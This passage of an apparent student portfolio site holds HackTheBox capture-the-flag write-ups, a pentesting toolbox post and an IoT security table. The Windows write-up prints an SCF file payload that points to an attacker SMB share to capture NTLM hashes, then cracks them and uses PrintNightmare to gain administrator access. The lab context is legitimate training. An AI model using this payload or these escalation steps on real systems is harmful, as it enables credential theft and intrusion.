          <a href="img/portfolio/minor/red/htb_linux/ExploitRun.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitRun.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/CrashGameServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CrashGameServer.png" alt=""></a>
          <p>I had to give it a few tries in order to succeed because in some cases the server was
          actually faster than my script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RootOnDocker.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootOnDocker.png" alt=""></a>
          <p>And it worked now we need to do the same thing in order to get root on the Drew machine
          but this time we don't have to worry about speed because we don't need to infect a
          script, we just have to do it fast enough before all the files inside the folder get
          deleted again.</p>
          <a href="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootFlag.png" alt=""></a>
          <p>That's it! We are root and got the flag!</p>
          <p>Although it took me quite a while to root this machine it was a really fun one.
          Containing a lot of different exploits mostly straight from the OWASP top 10 but also
          some I never heard of before like the docker priv esc.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal22" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Windows Write-up</p>
          <a href="img/portfolio/minor/red/htb_windows/DriverCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/DriverCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <a href="img/portfolio/minor/red/htb_windows/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/NMapOutput.png" alt=""></a>
          <p>When navigating to the webpage we are greeted by a login screen. After some searching and
          not finding anything useful I tried to login with just a default password admin:admin it
          was a longshot but it worked!</p>
          <a href="img/portfolio/minor/red/htb_windows/Dashboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/Dashboard.png" alt=""></a>
          <p>The only button that worked on the website was Firmware updates where you can upload a
          file. Knowing that SMB was also an open port I found this <a href="https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/">website</a>
          this could potentially it so lets try it out.
          </p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              [Shell]
                                              Command=2
                                              Iconfile=\\10.10.14.161\share\test.ico
                                              [Taskbar]
                                              Command=ToggleDesktop
                                          </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_windows/ResponderOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ResponderOutput.png" alt=""></a>
          <p>I created a payload like the example given on the site I found started responder and got
          a few hits. Now we know the username and maybe the password if we manage to crack
          it. We know from the responder output that it is a NTLM hash so lets put Hashcat on it
          and see what we'll get.</p>
          <a href="img/portfolio/minor/red/htb_windows/HashcatOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/HashcatOutput.png" alt=""></a>
          <p>Hashcat cracked the password with ease and now we can take a look at the SMB folder to
          see if we can find anything interesting.</p>
          <a href="img/portfolio/minor/red/htb_windows/SMBMap.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SMBMap.png" alt=""></a>
          <p>We didn't find anything interesting but knowing from the NMap output we also know that
          the RDP port is open so maybe it uses the same password.</p>
          <a href="img/portfolio/minor/red/htb_windows/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/UserFlag.png" alt=""></a>
          <p>This was indeed the case and now we already have the user flag. For priv esc running at
          least WinPEAS is a no-brainer. So I used SimpleHTTPServer to get WinPEAS on the target
          machine.</p>
          <a href="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/WgetWinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetWinpeas.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png" alt=""></a>
          <p>Really the only interesting thing WinPEAS found was a Print spooler process. After some
          Googling I stubled across <a href="https://github.com/calebstewart/CVE-2021-1675">this</a> CVE. So lets get
          that exploit on the target machine in the same way we did with WinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png" alt=""></a>
          <p>I wasn't able to run the script because of some permission issues, but after some
          Googling I found out I could just set the policy to unrestricted.</p>
          <a href="img/portfolio/minor/red/htb_windows/RunExploit.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RunExploit.png" alt=""></a>
          <p>I ran the exploit and it created a new administrator account for me with a username and
          password that I chose and know. Now the only thing that's left is just to logout as this
          user and login with our new user.</p>
          <a href="img/portfolio/minor/red/htb_windows/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RootFlag.png" alt=""></a>
          <p>And that's it! We have the root flag! This box wasn't that hard but still fun and
          sometimes challenging due to my lack of knowledge of Windows hacking. Overall a fun
          learning experience.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal24" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal25" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">My personal pen-testing toolboxes</p>
          <p>Like every other profession good tools make a world of difference on the quality and
          efficiency of the end product. This isn't any different with cyber security. Good tools
          can improve results providing you with more information and helping with getting to the
          results faster.</p>
          <h3>On the road</h3>
          <a href="img/portfolio/minor/red/kalilinux.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/kalilinux.jpg" alt=""></a>
          <p>On the road when I'm on my laptop I like to use Kali Linux. It's just convenient that it
          comes pre-loaded with all the tools you need, and it runs fairly lightweight on older
          laptops. The "kali-undercover" command is also a fun little gimmick that changes your
          Kali desktop to a Windows clone which for a random passer by looks just like a regular
          Windows machine. Making it incognito to use Kali whenever you're in a public space and
          want to keep a low profile.</p>
          <h3>At home</h3>
          <a href="img/portfolio/minor/red/parrotos.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/parrotos.jpg" alt=""></a>
          <p>At home on my main desktop PC I recently switched to natively running ParrotOS. This was
          because I liked to try something new and the reviews were good. It comes pre-loaded with
          the same tools as kali and a few extra tools like diverting all traffic trough tor
          making the machine even more anonymous. The user experience is a little better and just
          overall a good looking distro. This comes at a cost because it takes more resources to
          run. This isn't a problem on my PC because it's quite powerful and I don't have to think
          about battery life. Alongside ParrotOS I run a Windows VM in qemu with WinApps running
          on Linux which enables me to run any Windows application I want on Linux. I mostly use
          it for Microsoft Office products.</p>
          <h3>Cloud</h3>
          <a href="img/portfolio/minor/red/googlecloudconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/googlecloudconsole.PNG" alt=""></a>
          <p>Google cloud console is an awesome way to always have a Linux machine at your disposal
          where ever you are. It's fully cloud based and free to use. So when you're in need of a
          Linux terminal and you have access to a browser you're set. The only downside is that
          the machine is volatile so when you shut it down it is gone. This requires you to always
          re-install tools and such. Luckily due to it running on Google cloud it is pretty fast.
          Just overall a good tool to know about.</p>
          <a href="img/portfolio/minor/red/guacamole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamole.PNG" alt=""></a>
          <p>Now Guacamole is kinda like Google cloud console, but it's self-hosted. It can turn any
          machine with a SSH server into a cloud based web terminal accessible from any browser
          where ever you are. It takes a little time and effort to set it up but it is worth it.
          All the benefits from Google cloud console but your data is hosted by you and it is
          saved. In my case I installed Kali Linux on a docker server and now I can access it
          whenever I need to it doesn't matter if I'm on Windows, Linux or even my phone.</p>
          <a href="img/portfolio/minor/red/guacamoleconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamoleconsole.PNG" alt=""></a>
          <h3>Windows</h3>
          <a href="img/portfolio/minor/red/wsl.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/wsl.jpg" alt=""></a>
          <p>Whenever I'm using Windows and need to do a quick little task that requires Linux I don't
          want to reboot and boot into Linux because it's a hassle. That's when I use WSL. WSL
          stands for Windows Subsystem for Linux and it works great. It's not everything for
          example network related stuff is not possible due to WSL not having direct access to the
          network card but for other simple stuff it works great. And if I need to do a quick
          little scan I can use the Windows version of NMap. And if I need a little more
          functionality I can always use the before mentioned Guacamole to have instant access to
          a fully functional Kali instance in my browser.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal26" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Security of IOT protocols and technology</p>
          <p>Nowadays more and more people have their home filled with smart devices. Almost
          everything is smart in some way. Which creates new problems like security. These
          products weren't made with security in mind, on the contrary, they were made to be cheap
          and easy to use for people without IT knowledge.</p>
          <p>This causes IOT products to be, the most of the time, the weakest link in someones
          network. But IOT is here to stay and it is improving fast so let's take a look at some
          common security protocols.</p>
          <table>
          <tr>
          <th>Protocol</th>
          <th>Feature</th>
          <th>TCP/UDP</th>
          <th>Security</th>
          </tr>
          <tr>
          <td>LOWPAN</td>
          <td>WPANs to maintain an IPv6 network</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>MQTT</td>
          <td>To utilize the publish/subscribe pattern to provide transition flexibility and
          simplicity of implementation
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>AMQP</td>
          <td>To provide publish-subscribe and point-to point communication</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>CoAP</td>
          <td>To connect resource-constrained devices in a secure and reliable way</td>
          <td>UDP</td>
          <td>DTLS</td>
          </tr>
          <tr>
          <td>XMPP</td>
          <td>To transfer instant messaging (IM) standard that is used for multi-party
          chatting, voice and video calling and telepresence
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>DSS</td>
          <td>To enable scalable, real-time, dependable, high-performance and interoperable
          data exchanges using a publish–subscribe pattern
          </td>
          <td>TCP/UDP</td>
          <td>SSL</td>
          </tr>
          </table>
          <p>To show the security flaws in IOT devices</p>
          <table>
          <thead>
          <tr class="rowsep-1 valign-top">
          <th scope="col">Layers</th>
          <th scope="col">Attacks</th>
          <th scope="col">Issues</th>
          <th scope="col">Control Measures</th>
          </tr>
          </thead>
          <tbody>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Perception</td>
          <td class="align-left">Hardware Tempering</td>
          <td class="align-left">Data Leakage (Keys, Routing Tables, Etc)</td>
          <td class="align-left">Secure Physical Design</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Fake Node Injection</td>
          <td class="align-left">Fake Data Manipulation</td>
          <td class="align-left">Secure Booting</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Code Injection</td>
           <td class="align-left">Halt Transmission</td>
          <td class="align-left">Intrusion Detection Technology (IDT)</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sleep Denial Attack</td>
          <td class="align-left">Node Shutdown</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">WSN Node Jamming</td>
          <td class="align-left">Jam Node Communication</td>
          <td class="align-left">IPSec Security Channel</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RF Interference Of RFID</td>
          <td class="align-left">Distortion In Node Communication</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="12">Network</td>
          <td class="align-left">Traffic Analysis Attacks</td>
          <td class="align-left">Data Leakage (About Network)</td>
          <td class="align-left">Routing Security</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Spoofing</td>
          <td class="align-left">Intrusion In Network Data Manipulation</td>
          <td class="align-left">GPS Location System</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Unauthorized Access</td>
          <td class="align-left">Node Data Can Be Modified (Read, Write &amp; Delete)</td>
          <td class="align-left">Network Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sinkhole Attack</td>
          <td class="align-left">Data Leakage (Data Of The Nodes)</td>
          <td class="align-left">Security Aware Ad Hoc Routing</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Man In The Middle Attack</td>
          <td class="align-left">Data Privacy Violation</td>
          <td class="align-left">Point-To-Point Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Routing Information Attack</td>
          <td class="align-left">Routing Loops (Network Destruction)</td>
          <td class="align-left">Encrypting Routing Tables</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Application Security</td>
          <td class="align-left">Privacy Violation</td>
          <td class="align-left">Web Application Scanner</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Security</td>
           <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Homomorphic Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Underlying Infrastructure Security</td>
          <td class="align-left">Service Hijacking</td>
          <td class="align-left">Fragmentation Redundancy Scattering</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Third-Party Relationships</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Shared Resources</td>
          <td class="align-left">Resources Destruction</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virtualization Threats</td>
          <td class="align-left">Resources Theft</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Application</td>
          <td class="align-left">Phishing Attacks</td>
          <td class="align-left">Data Leakage (User Credentials Data)</td>
          <td class="align-left">Biometrics Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virus, Worms, Trojan Horse, Spyware</td>
          <td class="align-left">Resource Destruction &amp; Hijacking</td>
          <td class="align-left">Protective Software</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Scripts</td>
          <td class="align-left">Hijacking</td>
          <td class="align-left">Firewalls</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Denial Of Service</td>
          <td class="align-left">Resource Destruction</td>
          <td class="align-left">Access Control Lists</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Protection And Recovery</td>
          <td class="align-left">Data Loss &amp; Catastrophic Damage</td>
          <td class="align-left">Cryptographic Hash Functions</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Software Vulnerabilities</td>
          <td class="align-left">Buffer Over Flow</td>
          <td class="align-left">Awareness Of Security</td>
          </tr>
          </tbody>
          </table>
          <a href="https://www.sciencedirect.com/science/article/pii/S108480452030237X#sec3">Source</a>
           <p>As seen in this article there are a lot of different vulnerabilities in IOT devices. And
          not all of them can be solved with just a good security protocol.</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: November 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal27" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal28" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
           </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal29" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal30" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal31" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
           <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal33" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal34" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
           <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal35" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal36" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal37" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal38" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
